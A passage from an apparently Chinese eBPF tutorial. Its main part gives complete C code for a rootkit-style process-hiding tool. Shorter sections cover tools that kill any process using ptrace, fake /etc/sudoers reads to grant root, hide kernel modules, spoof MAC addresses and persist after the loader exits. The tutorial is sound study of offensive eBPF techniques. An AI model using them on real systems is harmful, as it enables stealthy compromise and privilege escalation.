<p>我们首先需要理解这个 eBPF 程序的基本构成和使用到的几个重要组件。前几行引用了几个重要的头文件,如 "vmlinux.h"、"bpf_helpers.h"、"bpf_tracing.h" 和 "bpf_core_read.h"。这些文件提供了 eBPF 编程所需的基础设施和一些重要的函数或宏。</p>
|
||
<ul>
|
||
<li>"vmlinux.h" 是一个包含了完整的内核数据结构的头文件,是从 vmlinux 内核二进制中提取的。使用这个头文件,eBPF 程序可以访问内核的数据结构。</li>
|
||
<li>"bpf_helpers.h" 头文件中定义了一系列的宏,这些宏是 eBPF 程序使用的 BPF 助手(helper)函数的封装。这些 BPF 助手函数是 eBPF 程序和内核交互的主要方式。</li>
|
||
<li>"bpf_tracing.h" 是用于跟踪事件的头文件,它包含了许多宏和函数,这些都是为了简化 eBPF 程序对跟踪点(tracepoint)的操作。</li>
|
||
<li>"bpf_core_read.h" 头文件提供了一组用于从内核读取数据的宏和函数。</li>
|
||
</ul>
|
||
<p>程序中定义了一系列的 map 结构,这些 map 是 eBPF 程序中的主要数据结构,它们用于在内核态和用户态之间共享数据,或者在 eBPF 程序中存储和传递数据。</p>
|
||
<p>其中,"rb" 是一个 Ringbuffer 类型的 map,它用于从内核向用户态传递消息。Ringbuffer 是一种能在内核和用户态之间高效传递大量数据的数据结构。</p>
|
||
<p>"map_buffs" 是一个 Hash 类型的 map,它用于存储目录项(dentry)的缓冲区地址。</p>
|
||
<p>"map_bytes_read" 是另一个 Hash 类型的 map,它记录当前已扫描到的缓冲区偏移量,使程序能够分多次循环搜索目录数据。</p>
|
||
<p>"map_to_patch" 是另一个 Hash 类型的 map,存储了需要被修改的目录项(dentry)的地址。</p>
|
||
<p>"map_prog_array" 是一个 Prog Array 类型的 map,它用于保存程序的尾部调用。</p>
|
||
<p>程序中的 "target_ppid" 和 "pid_to_hide_len"、"pid_to_hide" 是几个重要的全局变量,它们分别存储了目标父进程的 PID、需要隐藏的 PID 的长度以及需要隐藏的 PID。</p>
|
||
<p>接下来的代码部分,程序定义了一个名为 "linux_dirent64" 的结构体,这个结构体代表一个 Linux 目录项。然后程序定义了两个函数,"handle_getdents_enter" 和 "handle_getdents_exit",这两个函数分别在 getdents64 系统调用的入口和出口被调用,用于实现对目录项的操作。</p>
|
||
<pre><code class="language-c">
|
||
// Optional Target Parent PID
|
||
const volatile int target_ppid = 0;
|
||
|
||
// These store the string representation
|
||
// of the PID to hide. This becomes the name
|
||
// of the folder in /proc/
|
||
const volatile int pid_to_hide_len = 0;
|
||
const volatile char pid_to_hide[max_pid_len];
|
||
|
||
// struct linux_dirent64 {
|
||
// u64 d_ino; /* 64-bit inode number */
|
||
// u64 d_off; /* 64-bit offset to next structure */
|
||
// unsigned short d_reclen; /* Size of this dirent */
|
||
// unsigned char d_type; /* File type */
|
||
// char d_name[]; /* Filename (null-terminated) */ };
|
||
// int getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);
|
||
SEC("tp/syscalls/sys_enter_getdents64")
|
||
int handle_getdents_enter(struct trace_event_raw_sys_enter *ctx)
|
||
{
|
||
size_t pid_tgid = bpf_get_current_pid_tgid();
|
||
// Check if we're a process thread of interest
|
||
// if target_ppid is 0 then we target all pids
|
||
if (target_ppid != 0) {
|
||
struct task_struct *task = (struct task_struct *)bpf_get_current_task();
|
||
int ppid = BPF_CORE_READ(task, real_parent, tgid);
|
||
if (ppid != target_ppid) {
|
||
return 0;
|
||
}
|
||
}
|
||
int pid = pid_tgid >> 32;
|
||
unsigned int fd = ctx->args[0];
|
||
unsigned int buff_count = ctx->args[2];
|
||
|
||
// Store params in map for exit function
|
||
struct linux_dirent64 *dirp = (struct linux_dirent64 *)ctx->args[1];
|
||
bpf_map_update_elem(&map_buffs, &pid_tgid, &dirp, BPF_ANY);
|
||
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>在这部分代码中,我们可以看到 eBPF 程序的一部分具体实现,该程序负责在 <code>getdents64</code> 系统调用的入口处进行处理。</p>
|
||
<p>我们首先声明了几个全局的变量。其中 <code>target_ppid</code> 代表我们要关注的目标父进程的 PID。如果这个值为 0,那么我们将关注所有的进程。<code>pid_to_hide_len</code> 和 <code>pid_to_hide</code> 则分别用来存储我们要隐藏的进程的 PID 的长度和 PID 本身。这个 PID 会转化成 <code>/proc/</code> 目录下的一个文件夹的名称,因此被隐藏的进程在 <code>/proc/</code> 目录下将无法被看到。</p>
|
||
<p>接下来,我们声明了一个名为 <code>linux_dirent64</code> 的结构体。这个结构体代表一个 Linux 目录项,包含了一些元数据,如 inode 号、下一个目录项的偏移、当前目录项的长度、文件类型以及文件名。</p>
|
||
<p>然后是 <code>getdents64</code> 函数的原型。这个函数是 Linux 系统调用,用于读取一个目录的内容。我们的目标就是在这个函数执行的过程中,对目录项进行修改,以实现进程隐藏。</p>
|
||
<p>随后的部分是 eBPF 程序的具体实现。我们在 <code>getdents64</code> 系统调用的入口处定义了一个名为 <code>handle_getdents_enter</code> 的函数。这个函数首先获取了当前进程的 PID 和线程组 ID,然后检查这个进程是否是我们关注的进程。如果我们设置了 <code>target_ppid</code>,那么我们就只关注那些父进程的 PID 为 <code>target_ppid</code> 的进程。如果 <code>target_ppid</code> 为 0,我们就关注所有进程。</p>
|
||
<p>在确认了当前进程是我们关注的进程之后,我们将 <code>getdents64</code> 系统调用的参数保存到一个 map 中,以便在系统调用返回时使用。我们特别关注 <code>getdents64</code> 系统调用的第二个参数,它是一个指向 <code>linux_dirent64</code> 结构体的指针,代表了系统调用要读取的目录的内容。我们将这个指针以及当前的 PID 和线程组 ID 作为键值对保存到 <code>map_buffs</code> 这个 map 中。</p>
|
||
<p>至此,我们完成了 <code>getdents64</code> 系统调用入口处的处理。在系统调用返回时,我们将会在 <code>handle_getdents_exit</code> 函数中,对目录项进行修改,以实现进程隐藏。</p>
|
||
<p>在接下来的代码段中,我们将要实现在 <code>getdents64</code> 系统调用返回时的处理。我们主要的目标就是找到我们想要隐藏的进程,并且对目录项进行修改以实现隐藏。</p>
|
||
<p>我们首先定义了一个名为 <code>handle_getdents_exit</code> 的函数,它将在 <code>getdents64</code> 系统调用返回时被调用。</p>
|
||
<pre><code class="language-c">
|
||
SEC("tp/syscalls/sys_exit_getdents64")
|
||
int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx)
|
||
{
|
||
size_t pid_tgid = bpf_get_current_pid_tgid();
|
||
int total_bytes_read = ctx->ret;
|
||
// if bytes_read is 0, everything's been read
|
||
if (total_bytes_read <= 0) {
|
||
return 0;
|
||
}
|
||
|
||
// Check we stored the address of the buffer from the syscall entry
|
||
long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buffs, &pid_tgid);
|
||
if (pbuff_addr == 0) {
|
||
return 0;
|
||
}
|
||
|
||
// All of this is quite complex, but basically boils down to
|
||
// Calling 'handle_getdents_exit' in a loop to iterate over the file listing
|
||
// in chunks of 200, and seeing if a folder with the name of our pid is in there.
|
||
// If we find it, use 'bpf_tail_call' to jump to handle_getdents_patch to do the actual
|
||
// patching
|
||
long unsigned int buff_addr = *pbuff_addr;
|
||
struct linux_dirent64 *dirp = 0;
|
||
int pid = pid_tgid >> 32;
|
||
short unsigned int d_reclen = 0;
|
||
char filename[max_pid_len];
|
||
|
||
unsigned int bpos = 0;
|
||
unsigned int *pBPOS = bpf_map_lookup_elem(&map_bytes_read, &pid_tgid);
|
||
if (pBPOS != 0) {
|
||
bpos = *pBPOS;
|
||
}
|
||
|
||
for (int i = 0; i < 200; i ++) {
|
||
if (bpos >= total_bytes_read) {
|
||
break;
|
||
}
|
||
dirp = (struct linux_dirent64 *)(buff_addr+bpos);
|
||
bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen);
|
||
bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name);
|
||
|
||
int j = 0;
|
||
for (j = 0; j < pid_to_hide_len; j++) {
|
||
if (filename[j] != pid_to_hide[j]) {
|
||
break;
|
||
}
|
||
}
|
||
if (j == pid_to_hide_len) {
|
||
// ***********
|
||
// We've found the folder!!!
|
||
// Jump to handle_getdents_patch so we can remove it!
|
||
// ***********
|
||
bpf_map_delete_elem(&map_bytes_read, &pid_tgid);
|
||
bpf_map_delete_elem(&map_buffs, &pid_tgid);
|
||
bpf_tail_call(ctx, &map_prog_array, PROG_02);
|
||
}
|
||
bpf_map_update_elem(&map_to_patch, &pid_tgid, &dirp, BPF_ANY);
|
||
bpos += d_reclen;
|
||
}
|
||
|
||
// If we didn't find it, but there's still more to read,
|
||
// jump back the start of this function and keep looking
|
||
if (bpos < total_bytes_read) {
|
||
bpf_map_update_elem(&map_bytes_read, &pid_tgid, &bpos, BPF_ANY);
|
||
bpf_tail_call(ctx, &map_prog_array, PROG_01);
|
||
}
|
||
bpf_map_delete_elem(&map_bytes_read, &pid_tgid);
|
||
bpf_map_delete_elem(&map_buffs, &pid_tgid);
|
||
|
||
return 0;
|
||
}
|
||
|
||
</code></pre>
|
||
<p>在这个函数中,我们首先获取了当前进程的 PID 和线程组 ID,然后检查系统调用是否读取到了目录的内容。如果没有读取到内容,我们就直接返回。</p>
|
||
<p>然后我们从 <code>map_buffs</code> 这个 map 中获取 <code>getdents64</code> 系统调用入口处保存的目录内容的地址。如果我们没有保存过这个地址,那么就没有必要进行进一步的处理。</p>
|
||
<p>接下来的部分有点复杂,我们用了一个循环来迭代读取目录的内容,并且检查是否有我们想要隐藏的进程的 PID。如果我们找到了,我们就用 <code>bpf_tail_call</code> 函数跳转到 <code>handle_getdents_patch</code> 函数,进行实际的隐藏操作。</p>
|
||
<pre><code class="language-c">SEC("tp/syscalls/sys_exit_getdents64")
|
||
int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx)
|
||
{
|
||
// Only patch if we've already checked and found our pid's folder to hide
|
||
size_t pid_tgid = bpf_get_current_pid_tgid();
|
||
long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_to_patch, &pid_tgid);
|
||
if (pbuff_addr == 0) {
|
||
return 0;
|
||
}
|
||
|
||
// Unlink target, by reading in previous linux_dirent64 struct,
|
||
// and setting it's d_reclen to cover itself and our target.
|
||
// This will make the program skip over our folder.
|
||
long unsigned int buff_addr = *pbuff_addr;
|
||
struct linux_dirent64 *dirp_previous = (struct linux_dirent64 *)buff_addr;
|
||
short unsigned int d_reclen_previous = 0;
|
||
bpf_probe_read_user(&d_reclen_previous, sizeof(d_reclen_previous), &dirp_previous->d_reclen);
|
||
|
||
struct linux_dirent64 *dirp = (struct linux_dirent64 *)(buff_addr+d_reclen_previous);
|
||
short unsigned int d_reclen = 0;
|
||
bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen);
|
||
|
||
// Debug print
|
||
char filename[max_pid_len];
|
||
bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp_previous->d_name);
|
||
filename[pid_to_hide_len-1] = 0x00;
|
||
bpf_printk("[PID_HIDE] filename previous %s\n", filename);
|
||
bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name);
|
||
filename[pid_to_hide_len-1] = 0x00;
|
||
bpf_printk("[PID_HIDE] filename next one %s\n", filename);
|
||
|
||
// Attempt to overwrite
|
||
short unsigned int d_reclen_new = d_reclen_previous + d_reclen;
|
||
long ret = bpf_probe_write_user(&dirp_previous->d_reclen, &d_reclen_new, sizeof(d_reclen_new));
|
||
|
||
// Send an event
|
||
struct event *e;
|
||
e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
|
||
if (e) {
|
||
e->success = (ret == 0);
|
||
e->pid = (pid_tgid >> 32);
|
||
bpf_get_current_comm(&e->comm, sizeof(e->comm));
|
||
bpf_ringbuf_submit(e, 0);
|
||
}
|
||
|
||
bpf_map_delete_elem(&map_to_patch, &pid_tgid);
|
||
return 0;
|
||
}
|
||
|
||
</code></pre>
|
||
<p>在 <code>handle_getdents_patch</code> 函数中,我们首先检查 <code>map_to_patch</code> 中是否保存了需要修改的目录项地址,即是否已经找到了想要隐藏的进程的 PID。然后我们读取前一个目录项和目标目录项的 <code>d_reclen</code>,并把前一个目录项的 <code>d_reclen</code> 改为两者之和,让它覆盖目标目录项,这样读取目录的程序就会跳过目标进程对应的目录,从而隐藏我们的目标进程。</p>
|
||
<p>在这个过程中,我们用到了 <code>bpf_probe_read_user</code>、<code>bpf_probe_read_user_str</code>、<code>bpf_probe_write_user</code> 这几个函数来读取和写入用户空间的数据。这是因为在内核空间,我们不能直接访问用户空间的数据,必须使用这些特殊的函数。</p>
|
||
<p>在我们完成隐藏操作后,我们会向一个名为 <code>rb</code> 的环形缓冲区发送一个事件,并通过其中的 <code>success</code> 字段报告这次隐藏操作是否成功。我们用 <code>bpf_ringbuf_reserve</code> 函数来预留缓冲区空间,然后将事件的数据填充到这个空间,并最后用 <code>bpf_ringbuf_submit</code> 函数将事件提交到缓冲区。</p>
|
||
<p>最后,我们清理了之前保存在 map 中的数据,并返回。</p>
|
||
<p>这段代码是在 eBPF 环境下实现进程隐藏的一个很好的例子。通过这个例子,我们可以看到 eBPF 提供的丰富的功能,如系统调用跟踪、map 存储、用户空间数据访问、尾调用等。这些功能使得我们能够在内核空间实现复杂的逻辑,而不需要修改内核代码。</p>
|
||
<h2 id="用户态-ebpf-程序实现"><a class="header" href="#用户态-ebpf-程序实现">用户态 eBPF 程序实现</a></h2>
|
||
<p>我们在用户态的 eBPF 程序中主要进行了以下几个操作:</p>
|
||
<ol>
|
||
<li>打开 eBPF 程序。</li>
|
||
<li>设置我们想要隐藏的进程的 PID。</li>
|
||
<li>验证并加载 eBPF 程序。</li>
|
||
<li>等待并处理由 eBPF 程序发送的事件。</li>
|
||
</ol>
|
||
<p>首先,我们打开了 eBPF 程序。这个过程是通过调用 <code>pidhide_bpf__open</code> 函数实现的。如果这个过程失败了,我们就直接返回。</p>
|
||
<pre><code class="language-c"> skel = pidhide_bpf__open();
|
||
if (!skel)
|
||
{
|
||
fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno));
|
||
return 1;
|
||
}
|
||
</code></pre>
|
||
<p>接下来,我们设置了我们想要隐藏的进程的 PID。这个过程是通过将 PID 保存到 eBPF 程序的 <code>rodata</code> 区域实现的。默认情况下,我们隐藏的是当前进程。</p>
|
||
<pre><code class="language-c"> char pid_to_hide[10];
|
||
if (env.pid_to_hide == 0)
|
||
{
|
||
env.pid_to_hide = getpid();
|
||
}
|
||
sprintf(pid_to_hide, "%d", env.pid_to_hide);
|
||
strncpy(skel->rodata->pid_to_hide, pid_to_hide, sizeof(skel->rodata->pid_to_hide));
|
||
skel->rodata->pid_to_hide_len = strlen(pid_to_hide) + 1;
|
||
skel->rodata->target_ppid = env.target_ppid;
|
||
</code></pre>
|
||
<p>然后,我们验证并加载 eBPF 程序。这个过程是通过调用 <code>pidhide_bpf__load</code> 函数实现的。如果这个过程失败了,我们就进行清理操作。</p>
|
||
<pre><code class="language-c"> err = pidhide_bpf__load(skel);
|
||
if (err)
|
||
{
|
||
fprintf(stderr, "Failed to load and verify BPF skeleton\n");
|
||
goto cleanup;
|
||
}
|
||
</code></pre>
|
||
<p>最后,我们等待并处理由 eBPF 程序发送的事件。这个过程是通过调用 <code>ring_buffer__poll</code> 函数实现的。在这个过程中,我们每隔一段时间就检查一次环形缓冲区中是否有新的事件。如果有,我们就调用 <code>handle_event</code> 函数来处理这个事件。</p>
|
||
<pre><code class="language-c">printf("Successfully started!\n");
|
||
printf("Hiding PID %d\n", env.pid_to_hide);
|
||
while (!exiting)
|
||
{
|
||
err = ring_buffer__poll(rb, 100 /* timeout, ms */);
|
||
/* Ctrl-C will cause -EINTR */
|
||
if (err == -EINTR)
|
||
{
|
||
err = 0;
|
||
break;
|
||
}
|
||
if (err < 0)
|
||
{
|
||
printf("Error polling perf buffer: %d\n", err);
|
||
break;
|
||
}
|
||
}
|
||
</code></pre>
|
||
<p>在 <code>handle_event</code> 函数中,我们根据事件的内容打印了相应的消息。这个函数的参数包括一个上下文、事件的数据,以及数据的大小。我们首先将事件的数据转换为 <code>event</code> 结构体,然后根据 <code>success</code> 字段判断这个事件是否表示成功隐藏了一个进程,最后打印相应的消息。</p>
|
||
<pre><code class="language-c">static int handle_event(void *ctx, void *data, size_t data_sz)
|
||
{
|
||
const struct event *e = data;
|
||
if (e->success)
|
||
printf("Hid PID from program %d (%s)\n", e->pid, e->comm);
|
||
else
|
||
printf("Failed to hide PID from program %d (%s)\n", e->pid, e->comm);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>这段代码展示了如何在用户态使用 eBPF 程序来实现进程隐藏的功能。我们首先打开 eBPF 程序,然后设置我们想要隐藏的进程的 PID,再验证并加载 eBPF 程序,最后等待并处理由 eBPF 程序发送的事件。这个过程中,我们使用了 eBPF 提供的一些高级功能,如环形缓冲区和事件处理,这些功能使得我们能够在用户态方便地与内核态的 eBPF 程序进行交互。</p>
|
||
<p>完整源代码:<a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/24-hide">https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/24-hide</a></p>
|
||
<blockquote>
|
||
<p>本文所示技术仅为概念验证,仅供学习使用,严禁用于不符合法律法规要求的场景。</p>
|
||
</blockquote>
|
||
<h2 id="编译运行隐藏-pid"><a class="header" href="#编译运行隐藏-pid">编译运行,隐藏 PID</a></h2>
|
||
<p>首先,我们需要编译 eBPF 程序:</p>
|
||
<pre><code class="language-bash">make
|
||
</code></pre>
|
||
<p>然后,假设我们想要隐藏进程 ID 为 1534 的进程,可以运行如下命令:</p>
|
||
<pre><code class="language-sh">sudo ./pidhide --pid-to-hide 1534
|
||
</code></pre>
|
||
<p>这条命令将使所有尝试读取 <code>/proc/</code> 目录的操作都无法看到 PID 为 1534 的进程。例如,我们可以选择一个进程进行隐藏:</p>
|
||
<pre><code class="language-console">$ ps -aux | grep 1534
|
||
yunwei 1534 0.0 0.0 244540 6848 ? Ssl 6月02 0:00 /usr/libexec/gvfs-mtp-volume-monitor
|
||
yunwei 32065 0.0 0.0 17712 2580 pts/1 S+ 05:43 0:00 grep --color=auto 1534
|
||
</code></pre>
|
||
<p>此时通过 ps 命令可以看到进程 ID 为 1534 的进程。但是,如果我们运行 <code>sudo ./pidhide --pid-to-hide 1534</code>,再次运行 <code>ps -aux | grep 1534</code>,就会发现进程 ID 为 1534 的进程已经不见了。</p>
|
||
<pre><code class="language-console">$ sudo ./pidhide --pid-to-hide 1534
|
||
Hiding PID 1534
|
||
Hid PID from program 31529 (ps)
|
||
Hid PID from program 31551 (ps)
|
||
Hid PID from program 31560 (ps)
|
||
Hid PID from program 31582 (ps)
|
||
Hid PID from program 31582 (ps)
|
||
Hid PID from program 31585 (bash)
|
||
Hid PID from program 31585 (bash)
|
||
Hid PID from program 31609 (bash)
|
||
Hid PID from program 31640 (ps)
|
||
Hid PID from program 31649 (ps)
|
||
</code></pre>
|
||
<p>这个程序将匹配这个 pid 的进程隐藏,使得像 <code>ps</code> 这样的工具无法看到,我们可以通过 <code>ps aux | grep 1534</code> 来验证。</p>
|
||
<pre><code class="language-console">$ ps -aux | grep 1534
|
||
root 31523 0.1 0.0 22004 5616 pts/2 S+ 05:42 0:00 sudo ./pidhide -p 1534
|
||
root 31524 0.0 0.0 22004 812 pts/3 Ss 05:42 0:00 sudo ./pidhide -p 1534
|
||
root 31525 0.3 0.0 3808 2456 pts/3 S+ 05:42 0:00 ./pidhide -p 1534
|
||
yunwei 31583 0.0 0.0 17712 2612 pts/1 S+ 05:42 0:00 grep --color=auto 1534
|
||
</code></pre>
|
||
<h2 id="总结-19"><a class="header" href="#总结-19">总结</a></h2>
|
||
<p>通过本篇 eBPF 入门实践教程,我们深入了解了如何使用 eBPF 来隐藏进程或文件信息。我们学习了如何编写和加载 eBPF 程序,如何通过 eBPF 拦截系统调用并修改它们的行为,以及如何将这些知识应用到实际的网络安全和防御工作中。此外,我们也了解了 eBPF 的强大性,尤其是它能在不需要修改内核源代码或重启内核的情况下,允许用户在内核中执行自定义代码的能力。</p>
|
||
<p>您还可以访问我们的教程代码仓库 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 以获取更多示例和完整的教程。</p>
|
||
<p>接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容,包括如何使用 eBPF 进行网络和系统性能分析,如何编写更复杂的 eBPF 程序以及如何将 eBPF 集成到您的应用中。希望你会在我们的教程中找到有用的信息,进一步提升你的 eBPF 开发技能。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="用-bpf_send_signal-发送信号终止恶意进程"><a class="header" href="#用-bpf_send_signal-发送信号终止恶意进程">用 bpf_send_signal 发送信号终止恶意进程</a></h1>
|
||
<p>编译:</p>
|
||
<pre><code class="language-bash">make
|
||
</code></pre>
|
||
<p>使用方式:</p>
|
||
<pre><code class="language-bash">sudo ./bpfdos
|
||
</code></pre>
|
||
<p>这个程序会对任何试图使用 <code>ptrace</code> 系统调用的程序,例如 <code>strace</code>,发出 <code>SIGKILL</code> 信号。
|
||
一旦 <code>bpfdos</code> 开始运行,你可以通过运行以下命令进行测试:</p>
|
||
<pre><code class="language-bash">strace /bin/whoami
|
||
</code></pre>
|
||
<h2 id="参考资料-2"><a class="header" href="#参考资料-2">参考资料</a></h2>
|
||
<ul>
|
||
<li><a href="https://github.com/pathtofile/bad-bpf">https://github.com/pathtofile/bad-bpf</a></li>
|
||
</ul>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="使用-ebpf-添加-sudo-用户"><a class="header" href="#使用-ebpf-添加-sudo-用户">使用 eBPF 添加 sudo 用户</a></h1>
|
||
<p>编译:</p>
|
||
<pre><code class="language-bash">make
|
||
</code></pre>
|
||
<p>使用方式:</p>
|
||
<pre><code class="language-sh">sudo ./sudoadd --username lowpriv-user
|
||
</code></pre>
|
||
<p>这个程序允许一个通常权限较低的用户使用 <code>sudo</code> 成为 root。</p>
|
||
<p>它的工作方式是拦截 <code>sudo</code> 对 <code>/etc/sudoers</code> 文件的读取,并将读到的第一行覆盖为 <code>&lt;username&gt; ALL=(ALL:ALL) NOPASSWD:ALL #</code>。这欺骗了 sudo,使其认为用户被允许成为 root。其他程序如 <code>cat</code> 或 <code>sudoedit</code> 不受影响,所以对于这些程序来说,文件未改变,用户并没有这些权限。行尾的 <code>#</code> 确保行的其余部分被当作注释处理,因此不会破坏文件的逻辑。</p>
|
||
<h2 id="参考资料-3"><a class="header" href="#参考资料-3">参考资料</a></h2>
|
||
<ul>
|
||
<li><a href="https://github.com/pathtofile/bad-bpf">https://github.com/pathtofile/bad-bpf</a></li>
|
||
</ul>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="使用-ebpf-替换任意程序读取或写入的文本"><a class="header" href="#使用-ebpf-替换任意程序读取或写入的文本">使用 eBPF 替换任意程序读取或写入的文本</a></h1>
|
||
<p>编译:</p>
|
||
<pre><code class="language-bash">make
|
||
</code></pre>
|
||
<p>使用方式:</p>
|
||
<pre><code class="language-sh">sudo ./replace --filename /path/to/file --input foo --replace bar
|
||
</code></pre>
|
||
<p>这个程序将文件中所有与 <code>input</code> 匹配的文本替换为 <code>replace</code> 文本。
|
||
这有很多用途,例如:</p>
|
||
<p>隐藏内核模块 <code>joydev</code>,避免被如 <code>lsmod</code> 这样的工具发现:</p>
|
||
<pre><code class="language-bash">./replace -f /proc/modules -i 'joydev' -r 'cryptd'
|
||
</code></pre>
|
||
<p>伪造 <code>eth0</code> 接口的 MAC 地址:</p>
|
||
<pre><code class="language-bash">./replace -f /sys/class/net/eth0/address -i '00:15:5d:01:ca:05' -r '00:00:00:00:00:00'
|
||
</code></pre>
|
||
<p>恶意软件进行反沙箱检查可能会检查 MAC 地址,寻找是否正在虚拟机或沙箱内运行,而不是在“真实”的机器上运行的迹象。</p>
|
||
<p><strong>注意:</strong> <code>input</code> 和 <code>replace</code> 的长度必须相同,以避免在文本块的中间添加 NULL 字符。如果要在 bash 提示符下输入换行符,请使用 <code>$'\n'</code>,例如 <code>--replace $'text\n'</code>。</p>
|
||
<h2 id="参考资料-4"><a class="header" href="#参考资料-4">参考资料</a></h2>
|
||
<ul>
|
||
<li><a href="https://github.com/pathtofile/bad-bpf">https://github.com/pathtofile/bad-bpf</a></li>
|
||
</ul>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="在用户态应用退出后运行-ebpf-程序ebpf-程序的生命周期"><a class="header" href="#在用户态应用退出后运行-ebpf-程序ebpf-程序的生命周期">在用户态应用退出后运行 eBPF 程序:eBPF 程序的生命周期</a></h1>
|
||
<p>通过使用 detach 的方式运行 eBPF 程序,用户空间加载器可以退出,而不会停止 eBPF 程序。</p>
|
||
<h2 id="ebpf-程序的生命周期"><a class="header" href="#ebpf-程序的生命周期">eBPF 程序的生命周期</a></h2>
|
||
<p>首先,我们需要了解一些关键的概念,如 BPF 对象(包括程序、映射和调试信息)、文件描述符(FD)、引用计数(refcnt)等。在 eBPF 系统中,用户空间通过文件描述符访问 BPF 对象,而每个对象都有一个引用计数。当一个对象被创建时,其引用计数初始为 1。如果该对象不再被使用(即没有其他程序或文件描述符引用它),它的引用计数将降至 0,并在 RCU 宽限期后被释放。</p>
|
||
<p>接下来,我们需要了解 eBPF 程序的生命周期。首先,当你创建一个 BPF 程序,并将它连接到某个“钩子”(例如网络接口,系统调用等),它的引用计数会增加。然后,即使原始创建和加载该程序的用户空间进程退出,只要 BPF 程序的引用计数大于 0,它就会保持活动状态。然而,这个过程中有一个重要的点是:不是所有的钩子都是相等的。有些钩子是全局的,比如 XDP、tc's clsact 和 cgroup-based 钩子。这些全局钩子会一直保持 BPF 程序的活动状态,直到这些对象自身消失。而有些钩子是局部的,只在拥有它们的进程存活期间运行。</p>
|
||
<p>对于 BPF 对象(程序或映射)的生命周期管理,另一个关键的操作是“分离”(detach)。这个操作会阻止已附加程序的任何未来执行。然后,对于需要替换 BPF 程序的情况,你可以使用替换(replace)操作。这是一个复杂的过程,因为你需要确保在替换过程中,不会丢失正在处理的事件,而且新旧程序可能在不同的 CPU 上同时运行。</p>
|
||
<p>最后,除了通过文件描述符和引用计数来管理 BPF 对象的生命周期,还有一个叫做 BPFFS 的方法,也就是“BPF 文件系统”。用户空间进程可以在 BPFFS 中“固定”(pin)一个 BPF 程序或映射,这将增加对象的引用计数,使得即使 BPF 程序未附加到任何地方或 BPF 映射未被任何程序使用,该 BPF 对象也将保持活动状态。</p>
|
||
<p>所以,当我们谈论在后台运行 eBPF 程序时,我们需要清楚这个过程的含义。在某些情况下,即使用户空间进程已经退出,我们可能还希望 BPF 程序保持运行。这就需要我们正确地管理 BPF 对象的生命周期。</p>
|
||
<h2 id="运行"><a class="header" href="#运行">运行</a></h2>
|
||
<p>这里仍然使用上一节的字符串替换程序,来展示可能带来的安全风险。通过使用 <code>--detach</code> 运行程序,用户空间加载器可以退出,而不会停止 eBPF 程序。</p>
|
||
<p>编译:</p>
|
||
<pre><code class="language-bash">make
|
||
</code></pre>
|
||
<p>在运行前,请首先确保 bpf 文件系统已经被挂载:</p>
|
||
<pre><code class="language-bash">sudo mount bpffs -t bpf /sys/fs/bpf
|
||
mkdir /sys/fs/bpf/textreplace
|
||
</code></pre>
|
||
<p>然后,你可以以分离(detach)方式运行 <code>textreplace2</code>:</p>
|
||
<pre><code class="language-bash">./textreplace2 -f /proc/modules -i 'joydev' -r 'cryptd' -d
|
||
</code></pre>
|
||
<p>这将在 <code>/sys/fs/bpf/textreplace</code> 下创建一些 eBPF 链接文件。
|
||
一旦加载器成功运行,你可以通过运行以下命令检查日志:</p>
|
||
<pre><code class="language-bash">sudo cat /sys/kernel/debug/tracing/trace_pipe
|
||
# 确认链接文件存在
|
||
sudo ls -l /sys/fs/bpf/textreplace
|
||
</code></pre>
|
||
<p>然后,要停止,只需删除链接文件即可:</p>
|
||
<pre><code class="language-bash">sudo rm -r /sys/fs/bpf/textreplace
|
||
</code></pre>
|
||
<h2 id="参考资料-5"><a class="header" href="#参考资料-5">参考资料</a></h2>
|
||
<ul>
|
||
<li><a href="https://github.com/pathtofile/bad-bpf">https://github.com/pathtofile/bad-bpf</a></li>
|
||
<li><a href="https://facebookmicrosites.github.io/bpf/blog/2018/08/31/object-lifetime.html">https://facebookmicrosites.github.io/bpf/blog/2018/08/31/object-lifetime.html</a></li>
|
||
</ul>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="bpf-features-by-linux-kernel-version"><a class="header" href="#bpf-features-by-linux-kernel-version">BPF Features by Linux Kernel Version</a></h1>
|
||
<h2 id="ebpf-support"><a class="header" href="#ebpf-support">eBPF support</a></h2>
|
||
<div class="table-wrapper"><table><thead><tr><th>Kernel version</th><th>Commit</th></tr></thead><tbody>
|
||
<tr><td>3.15</td><td><a href="https://github.com/torvalds/linux/commit/bd4cf0ed331a275e9bf5a49e6d0fd55dffc551b8"><code>bd4cf0ed331a</code></a></td></tr>
|
||
</tbody></table>
|
||
</div>
|
||
<h2 id="jit-compiling"><a class="header" href="#jit-compiling">JIT compiling</a></h2>
|
||
<p>The list of supported architectures for your kernel can be retrieved with:</p>
|
||
<pre><code class="language-sh">git grep HAVE_EBPF_JIT arch/
|
||
</code></pre>
|
||
<div class="table-wrapper"><table><thead><tr><th>Feature / Architecture</th><th>Kernel version</th><th>Commit</th></tr></thead><tbody>
|
||
<tr><td>x86_64</td><td>3.16</td><td><a href="https://github.com/torvalds/linux/commit/622582786c9e041d0bd52bde201787adeab249f8"><code>622582786c9e</code></a></td></tr>
|
||
